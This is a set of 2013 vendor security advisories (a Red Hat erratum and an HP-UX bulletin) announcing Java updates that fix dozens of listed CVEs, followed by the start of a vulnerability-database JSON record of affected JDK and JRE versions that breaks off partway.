Updated java-1.7.0-oracle packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
- Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section. (CVE-2013-1500, CVE-2013-1571, CVE-2013-2400, CVE-2013-2407, CVE-2013-2412, CVE-2013-2437, CVE-2013-2442, CVE-2013-2443, CVE-2013-2444, CVE-2013-2445, CVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2449, CVE-2013-2450, CVE-2013-2451, CVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456, CVE-2013-2457, CVE-2013-2458, CVE-2013-2459, CVE-2013-2460, CVE-2013-2461, CVE-2013-2462, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465, CVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, CVE-2013-2473, CVE-2013-3744)
Red Hat would like to thank Tim Brown for reporting CVE-2013-1500, and US-CERT for reporting CVE-2013-1571. US-CERT acknowledges Oracle as the original reporter of CVE-2013-1571.
All users of java-1.7.0-oracle are advised to upgrade to these updated packages, which provide Oracle Java 7 Update 25 and resolve these issues. All running instances of Oracle Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
973474 - CVE-2013-1571 OpenJDK: Frame injection in generated HTML (Javadoc, 8012375) 975099 - CVE-2013-2470 OpenJDK: ImagingLib byte lookup processing (2D, 8011243) 975102 - CVE-2013-2471 OpenJDK: Incorrect IntegerComponentRaster size checks (2D, 8011248) 975107 - CVE-2013-2472 OpenJDK: Incorrect ShortBandedRaster size checks (2D, 8011253) 975110 - CVE-2013-2473 OpenJDK: Incorrect ByteBandedRaster size checks (2D, 8011257) 975115 - CVE-2013-2463 OpenJDK: Incorrect image attribute verification (2D, 8012438) 975118 - CVE-2013-2465 OpenJDK: Incorrect image channel verification (2D, 8012597) 975120 - CVE-2013-2469 OpenJDK: Incorrect image layout verification (2D, 8012601) 975121 - CVE-2013-2459 OpenJDK: Various AWT integer overflow checks (AWT, 8009071) 975122 - CVE-2013-2460 OpenJDK: tracing insufficient access checks (Serviceability, 8010209) 975124 - CVE-2013-2445 OpenJDK: Better handling of memory allocation errors (Hotspot, 7158805) 975125 - CVE-2013-2448 OpenJDK: Better access restrictions (Sound, 8006328) 975126 - CVE-2013-2461 OpenJDK: Missing check for valid DOMCanonicalizationMethod canonicalization algorithm (Libraries, 8014281) 975127 - CVE-2013-2407 OpenJDK: Integrate Apache Santuario, rework class loader (Libraries, 6741606, 8008744) 975129 - CVE-2013-2454 OpenJDK: SerialJavaObject package restriction (JDBC, 8009554) 975130 - CVE-2013-2458 OpenJDK: Method handles (Libraries, 8009424) 975131 - CVE-2013-2444 OpenJDK: Resource denial of service (AWT, 8001038) 975132 - CVE-2013-2446 OpenJDK: output stream access restrictions (CORBA, 8000642) 975133 - CVE-2013-2457 OpenJDK: Proper class checking (JMX, 8008120) 975134 - CVE-2013-2453 OpenJDK: MBeanServer Introspector package access (JMX, 8008124) 975137 - CVE-2013-2443 OpenJDK: AccessControlContext check order issue (Libraries, 8001330) 975138 - CVE-2013-2452 OpenJDK: Unique VMIDs (Libraries, 8001033) 975139 - CVE-2013-2455 OpenJDK: getEnclosing* checks (Libraries, 8007812) 975140 - CVE-2013-2447 OpenJDK: Prevent revealing the local address (Networking, 8001318) 975141 - CVE-2013-2450 OpenJDK: ObjectStreamClass circular reference denial of service (Serialization, 8000638) 975142 - CVE-2013-2456 OpenJDK: ObjectOutputStream access checks (Serialization, 8008132) 975144 - CVE-2013-2412 OpenJDK: JConsole SSL support (Serviceability, 8003703) 975145 - CVE-2013-2449 OpenJDK: GnomeFileTypeDetector path access check (Libraries, 8004288) 975146 - CVE-2013-2451 OpenJDK: exclusive port binding (Networking, 7170730) 975148 - CVE-2013-1500 OpenJDK: Insecure shared memory permissions (2D, 8001034) 975757 - CVE-2013-2464 Oracle JDK: unspecified vulnerability fixed in 7u25 (2D) 975761 - CVE-2013-2468 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment) 975764 - CVE-2013-2466 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment) 975769 - CVE-2013-2462 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment) 975770 - CVE-2013-2442 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment) 975773 - CVE-2013-2437 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment) 975774 - CVE-2013-2400 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment) 975775 - CVE-2013-3744 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)
- Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386: java-1.7.0-oracle-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el5_9.i386.rpm
x86_64: java-1.7.0-oracle-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386: java-1.7.0-oracle-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el5_9.i386.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el5_9.i386.rpm
x86_64: java-1.7.0-oracle-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el5_9.x86_64.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386: java-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.i686.rpm
x86_64: java-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64: java-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386: java-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.i686.rpm
x86_64: java-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386: java-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.i686.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.i686.rpm
x86_64: java-1.7.0-oracle-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-devel-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-javafx-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-jdbc-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-plugin-1.7.0.25-1jpp.1.el6_4.x86_64.rpm java-1.7.0-oracle-src-1.7.0.25-1jpp.1.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-1500.html https://www.redhat.com/security/data/cve/CVE-2013-1571.html https://www.redhat.com/security/data/cve/CVE-2013-2400.html https://www.redhat.com/security/data/cve/CVE-2013-2407.html https://www.redhat.com/security/data/cve/CVE-2013-2412.html https://www.redhat.com/security/data/cve/CVE-2013-2437.html https://www.redhat.com/security/data/cve/CVE-2013-2442.html https://www.redhat.com/security/data/cve/CVE-2013-2443.html https://www.redhat.com/security/data/cve/CVE-2013-2444.html https://www.redhat.com/security/data/cve/CVE-2013-2445.html https://www.redhat.com/security/data/cve/CVE-2013-2446.html https://www.redhat.com/security/data/cve/CVE-2013-2447.html https://www.redhat.com/security/data/cve/CVE-2013-2448.html https://www.redhat.com/security/data/cve/CVE-2013-2449.html https://www.redhat.com/security/data/cve/CVE-2013-2450.html https://www.redhat.com/security/data/cve/CVE-2013-2451.html https://www.redhat.com/security/data/cve/CVE-2013-2452.html https://www.redhat.com/security/data/cve/CVE-2013-2453.html https://www.redhat.com/security/data/cve/CVE-2013-2454.html https://www.redhat.com/security/data/cve/CVE-2013-2455.html https://www.redhat.com/security/data/cve/CVE-2013-2456.html https://www.redhat.com/security/data/cve/CVE-2013-2457.html https://www.redhat.com/security/data/cve/CVE-2013-2458.html https://www.redhat.com/security/data/cve/CVE-2013-2459.html https://www.redhat.com/security/data/cve/CVE-2013-2460.html https://www.redhat.com/security/data/cve/CVE-2013-2461.html https://www.redhat.com/security/data/cve/CVE-2013-2462.html https://www.redhat.com/security/data/cve/CVE-2013-2463.html https://www.redhat.com/security/data/cve/CVE-2013-2464.html https://www.redhat.com/security/data/cve/CVE-2013-2465.html https://www.redhat.com/security/data/cve/CVE-2013-2466.html https://www.redhat.com/security/data/cve/CVE-2013-2468.html https://www.redhat.com/security/data/cve/CVE-2013-2469.html https://www.redhat.com/security/data/cve/CVE-2013-2470.html https://www.redhat.com/security/data/cve/CVE-2013-2471.html https://www.redhat.com/security/data/cve/CVE-2013-2472.html https://www.redhat.com/security/data/cve/CVE-2013-2473.html https://www.redhat.com/security/data/cve/CVE-2013-3744.html https://access.redhat.com/security/updates/classification/#critical http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFRwxfSXlSAg2UNWIIRAtbuAJ9H6PHJcgqEan9vQtHjkUXl58kRpwCeI9sA Jow4P90PK0jpYNzHe9siPmU= =GzWl -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03874547
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03874547 Version: 1
HPSBUX02908 rev.1 - HP-UX Running Java6, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2013-07-31 Last Updated: 2013-07-31
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in the Java Runtime Environment (JRE) and the Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other exploits. HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.19 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-1500 (AV:L/AC:L/Au:N/C:P/I:P/A:N) 3.6 CVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2433 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2451 (AV:L/AC:H/Au:N/C:P/I:P/A:P) 3.7 CVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version Release Version
HP-UX B.11.11, B.11.23, B.11.31 JDK and JRE v6.0.20 or subsequent
MANUAL ACTIONS: Yes - Update For Java v6.0 update to Java v6.0.20 or subsequent PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11 HP-UX B.11.23 =========== Jdk60.JDK60-COM Jdk60.JDK60-PA20 Jdk60.JDK60-PA20W Jre60.JRE60-COM Jre60.JRE60-COM-DOC Jre60.JRE60-PA20 Jre60.JRE60-PA20-HS Jre60.JRE60-PA20W Jre60.JRE60-PA20W-HS Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.20.00 or subsequent
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk60.JDK60-COM Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.20.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 31 July 2013 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201306-0250", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", 